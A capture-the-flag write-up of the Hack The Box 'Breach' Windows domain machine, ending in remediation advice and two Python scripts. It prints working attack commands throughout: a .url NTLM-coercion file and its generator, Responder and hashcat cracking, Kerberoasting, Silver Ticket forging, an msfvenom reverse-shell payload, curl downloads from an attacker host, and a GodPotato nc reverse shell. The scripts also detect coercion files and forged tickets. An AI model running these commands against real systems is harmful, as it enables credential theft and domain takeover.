Breach writeup
Box name: Breach
Difficulty: Medium
OS: Windows
Overview: Breach is a medium difficulty Windows machine, where guest access to an SMB share is available. By leveraging write permissions on that SMB share, NTLMv2 hashes of a domain user are captured to obtain valid credentials. With access as a low-privileged domain user, a kerberoastable service account (svc_mssql) is revealed. After getting access to the service account, a Silver Ticket attack is performed to impersonate the Administrator user and gain access to Microsoft SQL Server. Through the xp_cmdshell feature, remote code execution is achieved as the svc_mssql service account. Finally, privilege escalation is performed by abusing the SeImpersonatePrivilege privilege.
Link: https://app.hackthebox.com/machines/Breach?sort_by=created_at&sort_type=desc
Machine IP: 10.129.16.205
The User flag for this Box is located in a non-standard directory, C:\share\transfer.
Ran rustscan against the machine.

I’ll check out SMB first.
smbclient -N -L //10.129.16.205/

Connecting to the share, we see some interesting directories and user folders.
smbclient //10.129.16.205/share

This share is writable and, interestingly, julia's directory was last updated at a completely different time than the others, which suggests someone is actively browsing it. We'll see if we can capture a hash using NTLM coercion. Created a file, pwn.url (Explorer resolves the IconFile UNC path as soon as the folder is listed, so no click is needed):
[InternetShortcut]
URL=http://10.10.16.27/
IconFile=\\10.10.16.27\share\icon.ico
IconIndex=1
Ran Responder to catch the authentication attempt.
sudo responder -I tun0
Put the file in julia's folder under the transfer directory and right away I got Julia's NTLMv2 hash.
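As an added example (not code from the original writeup), the following Python reproduces the coercion file above and also implements the check a share owner would want: parse .url and .scf files found on a share and report any UNC host they would make Explorer authenticate to. The attacker IP is the one used on the page; the share name, icon name and trusted-host list are assumptions.

```python
import re

# Constructed to match the writeup; share and icon names are assumptions.
ATTACKER_IP = "10.10.16.27"


def build_url_file(attacker_ip, share="share", icon="icon.ico"):
    """Build the .url payload. Explorer reads IconFile to draw the icon and
    authenticates (NTLM) to the UNC host as soon as the folder is listed."""
    lines = [
        "[InternetShortcut]",
        f"URL=http://{attacker_ip}/",
        f"IconFile=\\\\{attacker_ip}\\{share}\\{icon}",
        "IconIndex=1",
    ]
    return "\r\n".join(lines) + "\r\n"


def build_scf_file(attacker_ip, share="share", icon="icon.ico"):
    """Same trick via a Shell Command File (.scf); the field of interest is again IconFile."""
    lines = [
        "[Shell]",
        "Command=2",
        f"IconFile=\\\\{attacker_ip}\\{share}\\{icon}",
        "[Taskbar]",
        "Command=ToggleDesktop",
    ]
    return "\r\n".join(lines) + "\r\n"


# Keys whose values Explorer resolves automatically; a UNC or file:// target
# in one of them is what triggers the outbound authentication.
AUTO_RESOLVED_KEYS = {"iconfile", "url", "workingdirectory"}
UNC_RE = re.compile(r"^\\\\([^\\\s]+)\\")
FILE_URL_RE = re.compile(r"^file://([^/\s]+)/", re.IGNORECASE)


def referenced_hosts(content):
    """Parse INI-style .url/.scf content and return the hosts a client would contact."""
    hosts = []
    for raw in content.splitlines():
        key, sep, value = raw.partition("=")
        if not sep or key.strip().lower() not in AUTO_RESOLVED_KEYS:
            continue
        value = value.strip()
        match = UNC_RE.match(value) or FILE_URL_RE.match(value)
        if match and match.group(1) not in hosts:
            hosts.append(match.group(1))
    return hosts


def is_coercion_file(content, trusted_hosts):
    """True when the file would make a client authenticate to a host outside the trusted set."""
    trusted = {h.lower() for h in trusted_hosts}
    return any(h.lower() not in trusted for h in referenced_hosts(content))


if __name__ == "__main__":
    payload = build_url_file(ATTACKER_IP)
    print(payload)
    print("hosts referenced:", referenced_hosts(payload))
    # Trusted set is an assumption: the domain controller that legitimately hosts icons.
    print("coercion file:", is_coercion_file(payload, {"breachdc.breach.vl"}))
```

Run this over every .url/.scf dropped on the share (or on the file names reported in share-access audit events) and alert when is_coercion_file returns True; a shortcut that points only at an internal file server stays quiet.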

Saved the hash to a file and cracked it with hashcat (mode 5600 is NetNTLMv2).
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

julia.wong:Computer1
Couldn't get a shell with evil-winrm, but the box notes said user.txt would be in the share, and it is.

Did further enumeration with the new creds. I was able to list the domain users over LDAP.
nxc ldap 10.129.16.205 -u julia.wong -p 'Computer1' --users

Created a list of those users. Kerberoasted next, and we get a TGS hash for svc_mssql.
GetUserSPNs.py breach.vl/julia.wong:'Computer1' -dc-ip 10.129.16.205 -request

I was able to crack this too (mode 13100 is Kerberos 5 TGS-REP, RC4 etype 23).
hashcat -m 13100 hash2.txt /usr/share/wordlists/rockyou.txt

svc_mssql:Trustno1
Did more enumeration but couldn't find anything of importance. Ran BloodHound to see if it could guide me.
bloodhound-python -u svc_mssql -p 'Trustno1' -d breach.vl -ns 10.129.16.205 -c All --zip
I was stuck here and referred to the writeup. I had missed the SPN in BloodHound. There's definitely an MSSQL service running.

Originally, as nmap didn't pick it up, it went over my head. We can perform a Silver Ticket attack: service tickets for the MSSQLSvc SPN are encrypted with svc_mssql's own key, and with RC4 that key is simply the NT hash of the password we cracked, so we can forge a ticket for any user we like without ever talking to the DC. The domain SID comes from BloodHound.
ticketer.py -spn MSSQLSvc/breachdc.breach.vl -domain-sid S-1-5-21-2330692793-3312915120-706255856 -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain breach.vl -dc-ip 10.129.16.205 -user-id 500 Administrator

Point the Kerberos tooling at the forged ticket.
export KRB5CCNAME=Administrator.ccache
Then we can connect to MSSQL with the ticket and get a shell through xp_cmdshell (mssqlclient.py's built-in enable_xp_cmdshell command switches it on).
mssqlclient.py -k breachdc.breach.vl

Got a base64-encoded PowerShell reverse shell from https://www.revshells.com/ and ran it through xp_cmdshell, which lands a shell as svc_mssql.


When enumerating privileges (whoami /priv), I noticed we have SeImpersonatePrivilege. Created a Meterpreter payload.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.27 LPORT=1338 -f exe -o shell.exe
Set up listener in msfconsole.

Downloaded it to the victim machine.
wget http://10.10.16.27/shell.exe -OutFile C:\Windows\Temp\shell.exe
This didn't work as Defender was blocking it. Tried more poking but got stuck. I looked at the writeup again: instead we can use a potato attack like GodPotato (https://github.com/BeichenDream/GodPotato). Apparently wget is blocked but curl works.
cd C:\windows\tasks
curl http://10.10.16.27/GodPotato-NET4.exe -o GodPotato.exe
curl http://10.10.16.27/nc64.exe -o nc.exe

.\GodPotato.exe -cmd "C:\windows\tasks\nc.exe 10.10.16.27 4444 -e cmd.exe"
And we finally get a shell and can grab root.txt.


Attack Chain
1 – Reconnaissance
Ran RustScan and identified SMB ports. Checked SMB with anonymous access and found a readable and writable share whose transfer directory held user folders, including one for julia.wong that had been modified at a different time than the others, suggesting active use.
smbclient -N -L //10.129.16.205/
smbclient //10.129.16.205/share
2 – NTLM hash capture via malicious URL file
The transfer directory was writable. Created a .url file whose IconFile points at an attacker-controlled UNC path, so Explorer authenticates to the attacker's SMB listener as soon as a user lists the folder. Started Responder and placed the file in julia.wong's folder under transfer. Captured julia.wong's NTLMv2 hash immediately and cracked it with Hashcat using rockyou.
sudo responder -I tun0
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Credentials recovered: julia.wong:Computer1
3 – User flag and domain enumeration
Retrieved user.txt from the SMB share as specified in the box notes. Enumerated domain users via LDAP with the new credentials and built a user list. Kerberoasted and received a TGS hash for svc_mssql. Cracked it with Hashcat.
GetUserSPNs.py breach.vl/julia.wong:'Computer1' -dc-ip 10.129.16.205 -request
hashcat -m 13100 hash2.txt /usr/share/wordlists/rockyou.txt
Credentials recovered: svc_mssql:Trustno1
4 – Silver Ticket attack and MSSQL access
Ran BloodHound and identified an MSSQL SPN registered to svc_mssql. Service tickets for that SPN are encrypted with svc_mssql's key, so the cracked password (as an NT hash) plus the domain SID was enough to forge a TGS for MSSQLSvc impersonating Administrator (RID 500) without contacting the DC. Connected to MSSQL with the forged ticket and enabled xp_cmdshell to achieve code execution as svc_mssql.
ticketer.py -spn MSSQLSvc/breachdc.breach.vl -domain-sid S-1-5-21-2330692793-3312915120-706255856 -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain breach.vl -dc-ip 10.129.16.205 -user-id 500 Administrator
export KRB5CCNAME=Administrator.ccache
mssqlclient.py -k breachdc.breach.vl
5 – Privilege Escalation – GodPotato SeImpersonatePrivilege abuse
Identified SeImpersonatePrivilege on the svc_mssql token. A Meterpreter payload fetched with PowerShell's wget alias was blocked by Defender. Switched to curl, which was not blocked, to stage GodPotato and nc64.exe in C:\Windows\Tasks, then ran GodPotato to impersonate SYSTEM and spawn a reverse shell. Retrieved root.txt.
curl http://10.10.16.27/GodPotato-NET4.exe -o GodPotato.exe
.\GodPotato.exe -cmd "C:\windows\tasks\nc.exe 10.10.16.27 4444 -e cmd.exe"
Key Takeaways
- Writable SMB share enabling NTLM hash capture – The share transfer directory allowed anonymous or guest write access, enabling placement of a malicious .url file that triggered NTLM authentication when browsed by a domain user. SMB shares must be restricted to the minimum required permissions and write access must require explicit authentication. Shares must never be writable by anonymous or guest accounts.
- Weak password crackable with rockyou – julia.wong – Julia’s NTLMv2 hash was cracked using the rockyou wordlist. Domain user passwords must meet complexity requirements that resist offline cracking. A captured NTLMv2 hash is only as secure as the underlying password and weak passwords make hash capture attacks immediately effective.
- Kerberoastable service account with a weak password – svc_mssql – The svc_mssql account had an SPN registered and used the well-known password Trustno1, crackable in seconds. Service accounts with SPNs must use passwords of at least 25 randomly generated characters to make offline Kerberoast cracking computationally infeasible. Consider using Group Managed Service Accounts to automate password rotation.
- Silver Ticket attack enabled by service account hash – The svc_mssql NT hash, derived directly from the cracked password, is the key that encrypts service tickets for the MSSQLSvc SPN, so it was sufficient to forge tickets impersonating any domain user for that service without contacting the domain controller. Because no TGS request ever reaches the KDC, the DC logs nothing (no event 4769); the only trace is the logon on the SQL host itself, so DC-centric monitoring is blind to it. The forged tickets remain valid until the service account's key changes, which is why rotating the svc_mssql password immediately is critical.
- SeImpersonatePrivilege on an MSSQL service account enabling SYSTEM escalation – The svc_mssql token held SeImpersonatePrivilege, which GodPotato used to impersonate SYSTEM. SQL Server setup grants this privilege to its service account by default and the engine relies on it, so stripping it is rarely practical; the effective controls are denying command execution from inside the engine (xp_cmdshell, OLE Automation, CLR) and treating the SQL host as fully compromised once the service account can run code on it.
Remediation
[Immediate] Restrict SMB share write permissions Remove anonymous and guest write access from all SMB shares immediately. Require explicit authenticated authorization for write access and restrict the transfer directory to only the users with an operational requirement. Enable Detailed File Share auditing on the server (event 5145) and alert on .url, .lnk, and .scf files being created on shares, as these are indicators of hash capture attempts. Block outbound SMB (TCP 445) from workstations to anything other than approved file servers, since the capture only worked because Julia's client was free to authenticate to an attacker-controlled host.
[Immediate] Rotate all compromised credentials and enforce strong passwords Rotate julia.wong and svc_mssql passwords immediately. Implement a Fine-Grained Password Policy requiring a minimum of 15 characters with complexity for all domain accounts and a minimum of 25 randomly generated characters for all service accounts. Deploy a banned password list blocking Trustno1, Computer1, and similar common patterns.
[Immediate] Migrate svc_mssql to a Group Managed Service Account Replace the svc_mssql user account with a gMSA. The SPN still exists and a TGS can still be requested for it, but the gMSA's 240-byte random password, rotated automatically every 30 days by default, makes offline cracking infeasible, and each rotation also invalidates any Silver Ticket forged from the previous key. Run the SQL Server service under that gMSA with only the rights setup grants it, and do not add it to any local or domain administrative group.
[Immediate] Disable xp_cmdshell and restrict MSSQL surface Disable xp_cmdshell on all MSSQL instances where it is not explicitly required for a documented operational function. Audit all other dangerous MSSQL features including xp_dirtree, Ole Automation Procedures, and linked servers and disable any that are not required. Restrict MSSQL network access to authorized application servers only.
[Short-term] Implement Silver Ticket detection and Kerberos monitoring A forged service ticket never produces a 4769 on a domain controller, so detection has to correlate the service host's 4624 network logons (Kerberos authentication package) with TGS issuance across all DCs, alerting when a Kerberos logon has no matching 4769 for that account and service within the maximum ticket lifetime, or when the account name and SID in the logon disagree with the directory. Enable Kerberos service ticket auditing on every DC and forward the SQL host's Security log to the SIEM. Run BloodHound regularly to identify Kerberoastable accounts and prioritize remediating those with weak or crackable passwords.
[Long-term] Implement a tiered service account governance program Define a policy requiring all service accounts to use gMSAs where technically feasible, with regular audits of all accounts holding SPNs. Establish SLAs for remediating Kerberoastable accounts with weak passwords. Include MSSQL security configuration, SMB share permissions, and Silver Ticket attack paths in the regular penetration testing scope.
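The correlation described under the short-term item, as an added example that is not part of the original writeup: it runs the two checks (Kerberos logon on the service host with no ticket issued by any DC, and a name/SID mismatch) over constructed sample 4769 and 4624 events. The event timestamps, the svc_backup account, the RID values other than 500, and the 10-hour window (the default maximum service ticket lifetime) are assumptions; the domain SID is the one from the page.

```python
from datetime import datetime, timedelta

DOMAIN_SID = "S-1-5-21-2330692793-3312915120-706255856"

# Constructed directory snapshot: account name -> SID (RIDs other than 500 are assumptions).
DIRECTORY = {
    "Administrator": f"{DOMAIN_SID}-500",
    "julia.wong": f"{DOMAIN_SID}-1104",
    "svc_mssql": f"{DOMAIN_SID}-1105",
}

# Constructed sample events as a SIEM would ingest them (not logs from the box).
# Event 4769 on the DC: a service ticket was issued to "account" for the SPN owned by "service".
DC_4769 = [
    {"time": "2024-05-01T09:00:00", "account": "julia.wong", "service": "svc_mssql", "client": "10.10.16.27"},
    {"time": "2024-05-01T09:02:00", "account": "julia.wong", "service": "BREACHDC$", "client": "10.10.16.27"},
]
# Event 4624 on the SQL host: network logons and the authentication package used.
HOST_4624 = [
    {"time": "2024-05-01T09:01:00", "account": "julia.wong", "sid": f"{DOMAIN_SID}-1104",
     "logon_type": 3, "auth": "Kerberos", "src": "10.10.16.27"},
    # Forged Administrator ticket from the writeup: no DC ever issued it.
    {"time": "2024-05-01T09:40:00", "account": "Administrator", "sid": f"{DOMAIN_SID}-500",
     "logon_type": 3, "auth": "Kerberos", "src": "10.10.16.27"},
    # Sloppier forgery: an arbitrary name paired with the RID 500 SID.
    {"time": "2024-05-01T09:45:00", "account": "svc_backup", "sid": f"{DOMAIN_SID}-500",
     "logon_type": 3, "auth": "Kerberos", "src": "10.10.16.27"},
    # NTLM logons are validated by the DC over Netlogon and are out of scope here.
    {"time": "2024-05-01T09:50:00", "account": "julia.wong", "sid": f"{DOMAIN_SID}-1104",
     "logon_type": 3, "auth": "NTLM", "src": "10.10.16.27"},
]


def _t(stamp):
    return datetime.fromisoformat(stamp)


def find_silver_ticket_candidates(dc_4769, host_4624, service_account, directory,
                                  max_ticket_age=timedelta(hours=10)):
    """Return Kerberos network logons on the service host that no DC issued a ticket for,
    or whose account name and SID do not match the directory."""
    findings = []
    for logon in host_4624:
        if logon["auth"] != "Kerberos" or logon["logon_type"] != 3:
            continue
        when = _t(logon["time"])
        reasons = []
        issued = [
            e for e in dc_4769
            if e["account"] == logon["account"] and e["service"] == service_account
            and when - max_ticket_age <= _t(e["time"]) <= when
        ]
        if not issued:
            reasons.append("no 4769 on any DC for this account/service within ticket lifetime")
        if directory.get(logon["account"]) != logon["sid"]:
            reasons.append("account name and SID in the logon disagree with the directory")
        if reasons:
            findings.append({"account": logon["account"], "time": logon["time"],
                             "src": logon["src"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_silver_ticket_candidates(DC_4769, HOST_4624, "svc_mssql", DIRECTORY):
        print(finding)
```

The first check only holds if 4769 events from every domain controller are collected and retained for at least the ticket lifetime; a ticket issued by a DC whose logs are missing, or before the retention window, will look forged. The SID check is cheap and catches forgeries where the attacker picked a name and RID that do not belong together, but it does nothing against a ticket built, as on this page, with the real Administrator name and RID 500.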